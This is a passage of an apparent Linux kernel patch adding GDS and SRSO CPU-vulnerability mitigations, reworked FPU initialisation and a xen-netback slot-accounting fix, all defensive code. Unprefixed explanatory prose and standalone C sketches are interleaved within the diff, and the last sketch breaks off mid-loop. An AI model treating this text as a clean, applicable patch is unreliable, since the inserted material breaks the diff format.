+ 	VULNBL_INTEL_STEPPINGS(BROADWELL,	X86_STEPPING_ANY,		SRBDS),
+ 	VULNBL_INTEL_STEPPINGS(SKYLAKE_L,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(SKYLAKE_X,	X86_STEPPING_ANY,		MMIO | RETBLEED),
++	VULNBL_INTEL_STEPPINGS(SKYLAKE_X,	X86_STEPPING_ANY,		MMIO | RETBLEED | GDS),
+ 	VULNBL_INTEL_STEPPINGS(SKYLAKE,		X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(KABYLAKE_L,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(KABYLAKE,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED),
++	VULNBL_INTEL_STEPPINGS(KABYLAKE_L,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED | GDS),
++	VULNBL_INTEL_STEPPINGS(KABYLAKE,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED | GDS),
+ 	VULNBL_INTEL_STEPPINGS(CANNONLAKE_L,	X86_STEPPING_ANY,		RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(ICELAKE_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(ICELAKE_D,	X86_STEPPING_ANY,		MMIO),
+-	VULNBL_INTEL_STEPPINGS(ICELAKE_X,	X86_STEPPING_ANY,		MMIO),
+-	VULNBL_INTEL_STEPPINGS(COMETLAKE,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED),
++	VULNBL_INTEL_STEPPINGS(ICELAKE_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED | GDS),
++	VULNBL_INTEL_STEPPINGS(ICELAKE_D,	X86_STEPPING_ANY,		MMIO | GDS),
++	VULNBL_INTEL_STEPPINGS(ICELAKE_X,	X86_STEPPING_ANY,		MMIO | GDS),
++	VULNBL_INTEL_STEPPINGS(COMETLAKE,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED | GDS),
+ 	VULNBL_INTEL_STEPPINGS(COMETLAKE_L,	X86_STEPPINGS(0x0, 0x0),	MMIO | RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(COMETLAKE_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED),
++	VULNBL_INTEL_STEPPINGS(COMETLAKE_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED | GDS),
++	VULNBL_INTEL_STEPPINGS(TIGERLAKE_L,	X86_STEPPING_ANY,		GDS),
++	VULNBL_INTEL_STEPPINGS(TIGERLAKE,	X86_STEPPING_ANY,		GDS),
+ 	VULNBL_INTEL_STEPPINGS(LAKEFIELD,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(ROCKETLAKE,	X86_STEPPING_ANY,		MMIO | RETBLEED),
++	VULNBL_INTEL_STEPPINGS(ROCKETLAKE,	X86_STEPPING_ANY,		MMIO | RETBLEED | GDS),
+ 	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS),
+ 	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT_D,	X86_STEPPING_ANY,		MMIO),
+ 	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS),
+ 
+ 	VULNBL_AMD(0x15, RETBLEED),
+ 	VULNBL_AMD(0x16, RETBLEED),
+-	VULNBL_AMD(0x17, RETBLEED | SMT_RSB),
++	VULNBL_AMD(0x17, RETBLEED | SMT_RSB | SRSO),
+ 	VULNBL_HYGON(0x18, RETBLEED | SMT_RSB),
++	VULNBL_AMD(0x19, SRSO),
+ 	{}
+ };
+ 
+@@ -1390,6 +1404,21 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	if (cpu_matches(cpu_vuln_blacklist, SMT_RSB))
+ 		setup_force_cpu_bug(X86_BUG_SMT_RSB);
+ 
++	/*
++	 * Check if CPU is vulnerable to GDS. If running in a virtual machine on
++	 * an affected processor, the VMM may have disabled the use of GATHER by
++	 * disabling AVX2. The only way to do this in HW is to clear XCR0[2],
++	 * which means that AVX will be disabled.
++	 */
++	if (cpu_matches(cpu_vuln_blacklist, GDS) && !(ia32_cap & ARCH_CAP_GDS_NO) &&
++	    boot_cpu_has(X86_FEATURE_AVX))
++		setup_force_cpu_bug(X86_BUG_GDS);
++
++	if (!cpu_has(c, X86_FEATURE_SRSO_NO)) {
++		if (cpu_matches(cpu_vuln_blacklist, SRSO))
++			setup_force_cpu_bug(X86_BUG_SRSO);
++	}
++
+ 	if (cpu_matches(cpu_vuln_whitelist, NO_MELTDOWN))
+ 		return;
+ 
+@@ -1571,10 +1600,6 @@ static void __init early_identify_cpu(struct cpuinfo_x86 *c)
+ 
+ 	sld_setup(c);
+ 
+-	fpu__init_system(c);
+-
+-	init_sigframe_size();
+-
+ #ifdef CONFIG_X86_32
+ 	/*
+ 	 * Regardless of whether PCID is enumerated, the SDM says
+@@ -1957,6 +1982,8 @@ void identify_secondary_cpu(struct cpuinfo_x86 *c)
+ 	validate_apic_and_package_id(c);
+ 	x86_spec_ctrl_setup_ap();
+ 	update_srbds_msr();
++	if (boot_cpu_has_bug(X86_BUG_GDS))
++		update_gds_msr();
+ 
+ 	tsx_ap_init();
+ }
+@@ -2290,8 +2317,6 @@ void cpu_init(void)
+ 
+ 	doublefault_init_cpu_tss();
+ 
+-	fpu__init_cpu();
+-
+ 	if (is_uv_system())
+ 		uv_cpu_init();
+ 
+@@ -2307,6 +2332,7 @@ void cpu_init_secondary(void)
+ 	 */
+ 	cpu_init_exception_handling();
+ 	cpu_init();
++	fpu__init_cpu();
+ }
+ #endif
+ 
+@@ -2369,3 +2395,69 @@ void arch_smt_update(void)
+ 	/* Check whether IPI broadcasting can be enabled */
+ 	apic_smt_update();
+ }
++
++void __init arch_cpu_finalize_init(void)
++{
++	identify_boot_cpu();
++
++	/*
++	 * identify_boot_cpu() initialized SMT support information, let the
++	 * core code know.
++	 */
++	cpu_smt_check_topology();
++
++	if (!IS_ENABLED(CONFIG_SMP)) {
++		pr_info("CPU: ");
++		print_cpu_info(&boot_cpu_data);
++	}
++
++	cpu_select_mitigations();
++
++	arch_smt_update();
++
++	if (IS_ENABLED(CONFIG_X86_32)) {
++		/*
++		 * Check whether this is a real i386, which is no longer
++		 * supported, and fix up the utsname.
++		 */
++		if (boot_cpu_data.x86 < 4)
++			panic("Kernel requires i486+ for 'invlpg' and other features");
++
++		init_utsname()->machine[1] =
++			'0' + (boot_cpu_data.x86 > 6 ? 6 : boot_cpu_data.x86);
++	}
++
++	/*
++	 * Must be before alternatives because it might set or clear
++	 * feature bits.
++	 */
++	fpu__init_system();
++	fpu__init_cpu();
++
++	alternative_instructions();
++
++	if (IS_ENABLED(CONFIG_X86_64)) {
++		/*
++		 * Make sure the first 2MB area is not mapped by huge pages
++		 * There are typically fixed size MTRRs in there and overlapping
++		 * MTRRs into large pages causes slow downs.
++		 *
++		 * Right now we don't do that with gbpages because there seems
++		 * very little benefit for that case.
++		 */
++		if (!direct_gbpages)
++			set_memory_4k((unsigned long)__va(0), 1);
++	} else {
++		fpu__init_check_bugs();
++	}
++
++	/*
++	 * This needs to be called before any devices perform DMA
++	 * operations that might use the SWIOTLB bounce buffers. It will
++	 * mark the bounce buffers as decrypted so that their usage will
++	 * not cause "plain-text" data to be decrypted when accessed. It
++	 * must be called after late_time_init() so that Hyper-V x86/x64
++	 * hypercalls work when the SWIOTLB bounce buffers are decrypted.
++	 */
++	mem_encrypt_init();
++}
+diff --git a/arch/x86/kernel/cpu/cpu.h b/arch/x86/kernel/cpu/cpu.h
+index 7c9b5893c30ab..d9aeb335002dd 100644
+--- a/arch/x86/kernel/cpu/cpu.h
++++ b/arch/x86/kernel/cpu/cpu.h
+@@ -79,9 +79,11 @@ extern void detect_ht(struct cpuinfo_x86 *c);
+ extern void check_null_seg_clears_base(struct cpuinfo_x86 *c);
+ 
+ unsigned int aperfmperf_get_khz(int cpu);
++void cpu_select_mitigations(void);
+ 
+ extern void x86_spec_ctrl_setup_ap(void);
+ extern void update_srbds_msr(void);
++extern void update_gds_msr(void);
+ 
+ extern u64 x86_read_arch_cap_msr(void);
+ 
+diff --git a/arch/x86/kernel/fpu/init.c b/arch/x86/kernel/fpu/init.c
+index 851eb13edc014..998a08f17e331 100644
+--- a/arch/x86/kernel/fpu/init.c
++++ b/arch/x86/kernel/fpu/init.c
+@@ -53,7 +53,7 @@ void fpu__init_cpu(void)
+ 	fpu__init_cpu_xstate();
+ }
+ 
+-static bool fpu__probe_without_cpuid(void)
++static bool __init fpu__probe_without_cpuid(void)
+ {
+ 	unsigned long cr0;
+ 	u16 fsw, fcw;
+@@ -71,7 +71,7 @@ static bool fpu__probe_without_cpuid(void)
+ 	return fsw == 0 && (fcw & 0x103f) == 0x003f;
+ }
+ 
+-static void fpu__init_system_early_generic(struct cpuinfo_x86 *c)
++static void __init fpu__init_system_early_generic(void)
+ {
+ 	if (!boot_cpu_has(X86_FEATURE_CPUID) &&
+ 	    !test_bit(X86_FEATURE_FPU, (unsigned long *)cpu_caps_cleared)) {
+@@ -211,10 +211,10 @@ static void __init fpu__init_system_xstate_size_legacy(void)
+  * Called on the boot CPU once per system bootup, to set up the initial
+  * FPU state that is later cloned into all processes:
+  */
+-void __init fpu__init_system(struct cpuinfo_x86 *c)
++void __init fpu__init_system(void)
+ {
+ 	fpstate_reset(&current->thread.fpu);
+-	fpu__init_system_early_generic(c);
++	fpu__init_system_early_generic();
+ 
+ 	/*
+ 	 * The FPU has to be operational for some of the
+diff --git a/arch/x86/kernel/signal.c b/arch/x86/kernel/signal.c
+index 82c562e2cc982..55ed638cb3fdc 100644
+--- a/arch/x86/kernel/signal.c
++++ b/arch/x86/kernel/signal.c
+@@ -724,7 +724,7 @@ badframe:
+ static unsigned long __ro_after_init max_frame_size;
+ static unsigned int __ro_after_init fpu_default_state_size;
+ 
+-void __init init_sigframe_size(void)
++static int __init init_sigframe_size(void)
+ {
+ 	fpu_default_state_size = fpu__get_fpstate_size();
+ 
+@@ -736,7 +736,9 @@ void __init init_sigframe_size(void)
+ 	max_frame_size = round_up(max_frame_size, FRAME_ALIGNMENT);
+ 
+ 	pr_info("max sigframe size: %lu\n", max_frame_size);
++	return 0;
+ }
++early_initcall(init_sigframe_size);
+ 
+ unsigned long get_sigframe_size(void)
+ {
+diff --git a/arch/x86/kernel/vmlinux.lds.S b/arch/x86/kernel/vmlinux.lds.S
+index 15f29053cec46..fd03f5a1f0ef0 100644
+--- a/arch/x86/kernel/vmlinux.lds.S
++++ b/arch/x86/kernel/vmlinux.lds.S
+@@ -133,7 +133,20 @@ SECTIONS
+ 		LOCK_TEXT
+ 		KPROBES_TEXT
+ 		ALIGN_ENTRY_TEXT_BEGIN
++#ifdef CONFIG_CPU_SRSO
++		*(.text.__x86.rethunk_untrain)
++#endif
++
+ 		ENTRY_TEXT
++
++#ifdef CONFIG_CPU_SRSO
++		/*
++		 * See the comment above srso_untrain_ret_alias()'s
++		 * definition.
++		 */
++		. = srso_untrain_ret_alias | (1 << 2) | (1 << 8) | (1 << 14) | (1 << 20);
++		*(.text.__x86.rethunk_safe)
++#endif
+ 		ALIGN_ENTRY_TEXT_END
+ 		SOFTIRQENTRY_TEXT
+ 		STATIC_CALL_TEXT
+@@ -141,13 +154,15 @@ SECTIONS
+ 
+ #ifdef CONFIG_RETPOLINE
+ 		__indirect_thunk_start = .;
+-		*(.text.__x86.*)
++		*(.text.__x86.indirect_thunk)
++		*(.text.__x86.return_thunk)
+ 		__indirect_thunk_end = .;
+ #endif
+ 	} :text =0xcccc
+ 
+ 	/* End of text section, which should occupy whole number of pages */
+ 	_etext = .;
++
+ 	. = ALIGN(PAGE_SIZE);
+ 
+ 	X86_ALIGN_RODATA_BEGIN
+@@ -492,6 +507,21 @@ INIT_PER_CPU(irq_stack_backing_store);
+            "fixed_percpu_data is not at start of per-cpu area");
+ #endif
+ 
++ #ifdef CONFIG_RETHUNK
++. = ASSERT((__ret & 0x3f) == 0, "__ret not cacheline-aligned");
++. = ASSERT((srso_safe_ret & 0x3f) == 0, "srso_safe_ret not cacheline-aligned");
++#endif
++
++#ifdef CONFIG_CPU_SRSO
++/*
++ * GNU ld cannot do XOR so do: (A | B) - (A & B) in order to compute the XOR
++ * of the two function addresses:
++ */
++. = ASSERT(((srso_untrain_ret_alias | srso_safe_ret_alias) -
++		(srso_untrain_ret_alias & srso_safe_ret_alias)) == ((1 << 2) | (1 << 8) | (1 << 14) | (1 << 20)),
++		"SRSO function pair won't alias");
++#endif
++
+ #endif /* CONFIG_X86_64 */
+ 
+ #ifdef CONFIG_KEXEC_CORE
+diff --git a/arch/x86/kvm/cpuid.c b/arch/x86/kvm/cpuid.c
+index 6047dbe048803..7b4224f5ee2de 100644
+--- a/arch/x86/kvm/cpuid.c
++++ b/arch/x86/kvm/cpuid.c
+@@ -736,6 +736,9 @@ void kvm_set_cpu_caps(void)
+ 		F(PMM) | F(PMM_EN)
+ 	);
+ 
++	if (cpu_feature_enabled(X86_FEATURE_SRSO_NO))
++		kvm_cpu_cap_set(X86_FEATURE_SRSO_NO);
++
+ 	/*
+ 	 * Hide RDTSCP and RDPID if either feature is reported as supported but
+ 	 * probing MSR_TSC_AUX failed.  This is purely a sanity check and
+diff --git a/arch/x86/kvm/reverse_cpuid.h b/arch/x86/kvm/reverse_cpuid.h
+index a19d473d01847..7eeade35a425b 100644
+--- a/arch/x86/kvm/reverse_cpuid.h
++++ b/arch/x86/kvm/reverse_cpuid.h
+@@ -48,6 +48,7 @@ static const struct cpuid_reg reverse_cpuid[] = {
+ 	[CPUID_7_1_EAX]       = {         7, 1, CPUID_EAX},
+ 	[CPUID_12_EAX]        = {0x00000012, 0, CPUID_EAX},
+ 	[CPUID_8000_001F_EAX] = {0x8000001f, 0, CPUID_EAX},
++	[CPUID_8000_0021_EAX] = {0x80000021, 0, CPUID_EAX},
+ };
+ 
+ /*
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 0a212fe2cd398..fdb6007f2eb86 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -1485,7 +1485,9 @@ static void svm_vcpu_load(struct kvm_vcpu *vcpu, int cpu)
+ 
+ 	if (sd->current_vmcb != svm->vmcb) {
+ 		sd->current_vmcb = svm->vmcb;
+-		indirect_branch_prediction_barrier();
++
++		if (!cpu_feature_enabled(X86_FEATURE_IBPB_ON_VMEXIT))
++			indirect_branch_prediction_barrier();
+ 	}
+ 	if (kvm_vcpu_apicv_active(vcpu))
+ 		avic_vcpu_load(vcpu, cpu);
+diff --git a/arch/x86/kvm/svm/vmenter.S b/arch/x86/kvm/svm/vmenter.S
+index 34367dc203f21..5be9a63f09fff 100644
+--- a/arch/x86/kvm/svm/vmenter.S
++++ b/arch/x86/kvm/svm/vmenter.S
+@@ -223,6 +223,9 @@ SYM_FUNC_START(__svm_vcpu_run)
+ 	 */
+ 	UNTRAIN_RET
+ 
++	/* SRSO */
++	ALTERNATIVE "", "call entry_ibpb", X86_FEATURE_IBPB_ON_VMEXIT
++
+ 	/*
+ 	 * Clear all general purpose registers except RSP and RAX to prevent
+ 	 * speculative use of the guest's values, even those that are reloaded
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 32f589b96d997..f4b12c3c30a01 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -311,6 +311,8 @@ u64 __read_mostly host_xcr0;
+ 
+ static struct kmem_cache *x86_emulator_cache;
+ 
++extern bool gds_ucode_mitigated(void);
++
+ /*
+  * When called, it means the previous get/set msr reached an invalid msr.
+  * Return true if we want to ignore/silent this failed msr access.
+@@ -1613,7 +1615,7 @@ static unsigned int num_msr_based_features;
+ 	 ARCH_CAP_SKIP_VMENTRY_L1DFLUSH | ARCH_CAP_SSB_NO | ARCH_CAP_MDS_NO | \
+ 	 ARCH_CAP_PSCHANGE_MC_NO | ARCH_CAP_TSX_CTRL_MSR | ARCH_CAP_TAA_NO | \
+ 	 ARCH_CAP_SBDR_SSDP_NO | ARCH_CAP_FBSDP_NO | ARCH_CAP_PSDP_NO | \
+-	 ARCH_CAP_FB_CLEAR | ARCH_CAP_RRSBA | ARCH_CAP_PBRSB_NO)
++	 ARCH_CAP_FB_CLEAR | ARCH_CAP_RRSBA | ARCH_CAP_PBRSB_NO | ARCH_CAP_GDS_NO)
+ 
+ static u64 kvm_get_arch_capabilities(void)
+ {
+@@ -1670,6 +1672,9 @@ static u64 kvm_get_arch_capabilities(void)
+ 		 */
+ 	}
+ 
++	if (!boot_cpu_has_bug(X86_BUG_GDS) || gds_ucode_mitigated())
++		data |= ARCH_CAP_GDS_NO;
++
+ 	return data;
+ }
+ 
+diff --git a/arch/x86/lib/retpoline.S b/arch/x86/lib/retpoline.S
+index 841955dc2573d..30e76fab678a5 100644
+--- a/arch/x86/lib/retpoline.S
++++ b/arch/x86/lib/retpoline.S
+@@ -9,6 +9,7 @@
+ #include <asm/nospec-branch.h>
+ #include <asm/unwind_hints.h>
+ #include <asm/frame.h>
++#include <asm/nops.h>
+ 
+ 	.section .text.__x86.indirect_thunk
+ 
+@@ -74,6 +75,46 @@ SYM_CODE_END(__x86_indirect_thunk_array)
+  */
+ #ifdef CONFIG_RETHUNK
+ 
++/*
++ * srso_untrain_ret_alias() and srso_safe_ret_alias() are placed at
++ * special addresses:
++ *
++ * - srso_untrain_ret_alias() is 2M aligned
++ * - srso_safe_ret_alias() is also in the same 2M page but bits 2, 8, 14
++ * and 20 in its virtual address are set (while those bits in the
++ * srso_untrain_ret_alias() function are cleared).
++ *
++ * This guarantees that those two addresses will alias in the branch
++ * target buffer of Zen3/4 generations, causing any potentially
++ * poisoned entries at that BTB slot to be evicted.
++ *
++ * As a result, srso_safe_ret_alias() becomes a safe return.
++ */
++#ifdef CONFIG_CPU_SRSO
++	.section .text.__x86.rethunk_untrain
++
++SYM_START(srso_untrain_ret_alias, SYM_L_GLOBAL, SYM_A_NONE)
++	ANNOTATE_NOENDBR
++	ASM_NOP2
++	lfence
++	jmp __x86_return_thunk
++SYM_FUNC_END(srso_untrain_ret_alias)
++__EXPORT_THUNK(srso_untrain_ret_alias)
++
++	.section .text.__x86.rethunk_safe
++#endif
++
++/* Needs a definition for the __x86_return_thunk alternative below. */
++SYM_START(srso_safe_ret_alias, SYM_L_GLOBAL, SYM_A_NONE)
++#ifdef CONFIG_CPU_SRSO
++	add $8, %_ASM_SP
++	UNWIND_HINT_FUNC
++#endif
++	ANNOTATE_UNRET_SAFE
++	ret
++	int3
++SYM_FUNC_END(srso_safe_ret_alias)
++
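
To make the placement above concrete: the linker script pins
srso_safe_ret_alias at the address of the 2M-aligned srso_untrain_ret_alias
with bits 2, 8, 14 and 20 set, and since all four bits lie below bit 21 the
pair can never leave the shared 2M page. A sketch of that arithmetic with a
hypothetical address, for illustration only:

  #include <assert.h>
  #include <stdint.h>

  #define ALIAS_BITS ((1u << 2) | (1u << 8) | (1u << 14) | (1u << 20))
  #define SZ_2M      (1u << 21)

  int main(void)
  {
          uint64_t untrain = 0xffffffff82200000ULL;  /* hypothetical, 2M aligned */
          uint64_t safe = untrain | ALIAS_BITS;      /* the ". = ... | bits" step */

          assert((untrain & (SZ_2M - 1)) == 0);      /* 2M alignment holds */
          assert((untrain & ALIAS_BITS) == 0);       /* bits clear in untrain */
          assert((untrain >> 21) == (safe >> 21));   /* same 2M page */
          return 0;
  }
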
+ 	.section .text.__x86.return_thunk
+ 
+ /*
+@@ -86,7 +127,7 @@ SYM_CODE_END(__x86_indirect_thunk_array)
+  *    from re-poisoning the BTB prediction.
+  */
+ 	.align 64
+-	.skip 63, 0xcc
++	.skip 64 - (__ret - zen_untrain_ret), 0xcc
+ SYM_START(zen_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
+ 	ANNOTATE_NOENDBR
+ 	/*
+@@ -118,10 +159,10 @@ SYM_START(zen_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
+ 	 * evicted, __x86_return_thunk will suffer Straight Line Speculation
+ 	 * which will be contained safely by the INT3.
+ 	 */
+-SYM_INNER_LABEL(__x86_return_thunk, SYM_L_GLOBAL)
++SYM_INNER_LABEL(__ret, SYM_L_GLOBAL)
+ 	ret
+ 	int3
+-SYM_CODE_END(__x86_return_thunk)
++SYM_CODE_END(__ret)
+ 
+ 	/*
+ 	 * Ensure the TEST decoding / BTB invalidation is complete.
+@@ -132,11 +173,45 @@ SYM_CODE_END(__x86_return_thunk)
+ 	 * Jump back and execute the RET in the middle of the TEST instruction.
+ 	 * INT3 is for SLS protection.
+ 	 */
+-	jmp __x86_return_thunk
++	jmp __ret
+ 	int3
+ SYM_FUNC_END(zen_untrain_ret)
+ __EXPORT_THUNK(zen_untrain_ret)
+ 
++/*
++ * SRSO untraining sequence for Zen1/2, similar to zen_untrain_ret()
++ * above. On kernel entry, srso_untrain_ret() is executed which is a
++ *
++ * movabs $0xccccccc308c48348,%rax
++ *
++ * and when the return thunk executes the inner label srso_safe_ret()
++ * later, it is a stack manipulation and a RET which is mispredicted and
++ * thus a "safe" one to use.
++ */
++	.align 64
++	.skip 64 - (srso_safe_ret - srso_untrain_ret), 0xcc
++SYM_START(srso_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
++	ANNOTATE_NOENDBR
++	.byte 0x48, 0xb8
++
++SYM_INNER_LABEL(srso_safe_ret, SYM_L_GLOBAL)
++	add $8, %_ASM_SP
++	ret
++	int3
++	int3
++	int3
++	lfence
++	call srso_safe_ret
++	int3
++SYM_CODE_END(srso_safe_ret)
++SYM_FUNC_END(srso_untrain_ret)
++__EXPORT_THUNK(srso_untrain_ret)
++
++SYM_FUNC_START(__x86_return_thunk)
++	ALTERNATIVE_2 "jmp __ret", "call srso_safe_ret", X86_FEATURE_SRSO, \
++			"call srso_safe_ret_alias", X86_FEATURE_SRSO_ALIAS
++	int3
++SYM_CODE_END(__x86_return_thunk)
+ EXPORT_SYMBOL(__x86_return_thunk)
+ 
+ #endif /* CONFIG_RETHUNK */
+diff --git a/arch/x86/mm/init.c b/arch/x86/mm/init.c
+index 0d5ccea2538fc..913287b9340c9 100644
+--- a/arch/x86/mm/init.c
++++ b/arch/x86/mm/init.c
+@@ -27,6 +27,7 @@
+ #include <asm/pti.h>
+ #include <asm/text-patching.h>
+ #include <asm/memtype.h>
++#include <asm/paravirt.h>
+ 
+ /*
+  * We need to define the tracepoints somewhere, and tlb.c
+@@ -826,9 +827,12 @@ void __init poking_init(void)
+ 	spinlock_t *ptl;
+ 	pte_t *ptep;
+ 
+-	poking_mm = copy_init_mm();
++	poking_mm = mm_alloc();
+ 	BUG_ON(!poking_mm);
+ 
++	/* Xen PV guests need the PGD to be pinned. */
++	paravirt_arch_dup_mmap(NULL, poking_mm);
++
+ 	/*
+ 	 * Randomize the poking address, but make sure that the following page
+ 	 * will be mapped at the same PMD. We need 2 pages, so find space for 3,
+diff --git a/arch/x86/xen/smp_pv.c b/arch/x86/xen/smp_pv.c
+index 6175f2c5c8224..e97bab7b00100 100644
+--- a/arch/x86/xen/smp_pv.c
++++ b/arch/x86/xen/smp_pv.c
+@@ -63,6 +63,7 @@ static void cpu_bringup(void)
+ 
+ 	cr4_init();
+ 	cpu_init();
++	fpu__init_cpu();
+ 	touch_softlockup_watchdog();
+ 
+ 	/* PVH runs in ring 0 and allows us to do native syscalls. Yay! */
+diff --git a/arch/xtensa/include/asm/bugs.h b/arch/xtensa/include/asm/bugs.h
+deleted file mode 100644
+index 69b29d1982494..0000000000000
+--- a/arch/xtensa/include/asm/bugs.h
++++ /dev/null
+@@ -1,18 +0,0 @@
+-/*
+- * include/asm-xtensa/bugs.h
+- *
+- * This is included by init/main.c to check for architecture-dependent bugs.
+- *
+- * Xtensa processors don't have any bugs.  :)
+- *
+- * This file is subject to the terms and conditions of the GNU General
+- * Public License.  See the file "COPYING" in the main directory of
+- * this archive for more details.
+- */
+-
+-#ifndef _XTENSA_BUGS_H
+-#define _XTENSA_BUGS_H
+-
+-static void check_bugs(void) { }
+-
+-#endif /* _XTENSA_BUGS_H */
+diff --git a/drivers/base/cpu.c b/drivers/base/cpu.c
+index 7af8e33735a36..dab70a65377c8 100644
+--- a/drivers/base/cpu.c
++++ b/drivers/base/cpu.c
+@@ -577,6 +577,18 @@ ssize_t __weak cpu_show_retbleed(struct device *dev,
+ 	return sysfs_emit(buf, "Not affected\n");
+ }
+ 
++ssize_t __weak cpu_show_gds(struct device *dev,
++			    struct device_attribute *attr, char *buf)
++{
++	return sysfs_emit(buf, "Not affected\n");
++}
++
++ssize_t __weak cpu_show_spec_rstack_overflow(struct device *dev,
++					     struct device_attribute *attr, char *buf)
++{
++	return sysfs_emit(buf, "Not affected\n");
++}
++
+ static DEVICE_ATTR(meltdown, 0444, cpu_show_meltdown, NULL);
+ static DEVICE_ATTR(spectre_v1, 0444, cpu_show_spectre_v1, NULL);
+ static DEVICE_ATTR(spectre_v2, 0444, cpu_show_spectre_v2, NULL);
+@@ -588,6 +600,8 @@ static DEVICE_ATTR(itlb_multihit, 0444, cpu_show_itlb_multihit, NULL);
+ static DEVICE_ATTR(srbds, 0444, cpu_show_srbds, NULL);
+ static DEVICE_ATTR(mmio_stale_data, 0444, cpu_show_mmio_stale_data, NULL);
+ static DEVICE_ATTR(retbleed, 0444, cpu_show_retbleed, NULL);
++static DEVICE_ATTR(gather_data_sampling, 0444, cpu_show_gds, NULL);
++static DEVICE_ATTR(spec_rstack_overflow, 0444, cpu_show_spec_rstack_overflow, NULL);
+ 
+ static struct attribute *cpu_root_vulnerabilities_attrs[] = {
+ 	&dev_attr_meltdown.attr,
+@@ -601,6 +615,8 @@ static struct attribute *cpu_root_vulnerabilities_attrs[] = {
+ 	&dev_attr_srbds.attr,
+ 	&dev_attr_mmio_stale_data.attr,
+ 	&dev_attr_retbleed.attr,
++	&dev_attr_gather_data_sampling.attr,
++	&dev_attr_spec_rstack_overflow.attr,
+ 	NULL
+ };
+ 
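
With the attributes above in place, the new vulnerability state is readable
from user space like the existing entries. A short reader in C; the file
names follow directly from the DEVICE_ATTR names added in this hunk:

  #include <stdio.h>

  int main(void)
  {
          const char *files[] = {
                  "/sys/devices/system/cpu/vulnerabilities/gather_data_sampling",
                  "/sys/devices/system/cpu/vulnerabilities/spec_rstack_overflow",
          };
          char line[128];

          for (int i = 0; i < 2; i++) {
                  FILE *f = fopen(files[i], "r");

                  if (f && fgets(line, sizeof(line), f))
                          printf("%s: %s", files[i], line);
                  if (f)
                          fclose(f);
          }
          return 0;
  }
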
+diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
+index c35c085dbc877..c3a8d78a41a7b 100644
+--- a/drivers/net/xen-netback/netback.c
++++ b/drivers/net/xen-netback/netback.c
+@@ -396,7 +396,7 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 	struct gnttab_map_grant_ref *gop = queue->tx_map_ops + *map_ops;
+ 	struct xen_netif_tx_request *txp = first;
+ 
+-	nr_slots = shinfo->nr_frags + 1;
++	nr_slots = shinfo->nr_frags + frag_overflow + 1;
+ 
+ 	copy_count(skb) = 0;
+ 	XENVIF_TX_CB(skb)->split_mask = 0;
+@@ -462,8 +462,8 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 		}
+ 	}
+ 
+-	for (shinfo->nr_frags = 0; shinfo->nr_frags < nr_slots;
+-	     shinfo->nr_frags++, gop++) {
++	for (shinfo->nr_frags = 0; nr_slots > 0 && shinfo->nr_frags < MAX_SKB_FRAGS;
++	     shinfo->nr_frags++, gop++, nr_slots--) {
+ 		index = pending_index(queue->pending_cons++);
+ 		pending_idx = queue->pending_ring[index];
+ 		xenvif_tx_create_map_op(queue, pending_idx, txp,
+@@ -476,12 +476,12 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 			txp++;
+ 	}
+ 
+-	if (frag_overflow) {
++	if (nr_slots > 0) {
+ 
+ 		shinfo = skb_shinfo(nskb);
+ 		frags = shinfo->frags;
+ 
+-		for (shinfo->nr_frags = 0; shinfo->nr_frags < frag_overflow;
++		for (shinfo->nr_frags = 0; shinfo->nr_frags < nr_slots;
+ 		     shinfo->nr_frags++, txp++, gop++) {
+ 			index = pending_index(queue->pending_cons++);
+ 			pending_idx = queue->pending_ring[index];
+@@ -492,6 +492,11 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 		}
+ 
+ 		skb_shinfo(skb)->frag_list = nskb;
++	} else if (nskb) {
++		/* A frag_list skb was allocated but it is no longer needed
++		 * because enough slots were converted to copy ops above.
++		 */
++		kfree_skb(nskb);
+ 	}
+ 
+ 	(*copy_ops) = cop - queue->tx_copy_ops;
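
The rework above makes nr_slots count all remaining slots including the
overflow, lets the main loop consume at most MAX_SKB_FRAGS of them, spills
the remainder into the frag_list skb, and frees the preallocated nskb when
nothing is left to spill. A toy model of just that accounting, with invented
names and none of the Xen types:

  #include <stdio.h>

  #define MAX_FRAGS 17    /* stands in for MAX_SKB_FRAGS */

  int main(void)
  {
          int nr_frags = 15, frag_overflow = 5;
          int nr_slots = nr_frags + frag_overflow;  /* +1 header slot in the real code */
          int main_frags = 0;

          while (nr_slots > 0 && main_frags < MAX_FRAGS) {
                  main_frags++;
                  nr_slots--;
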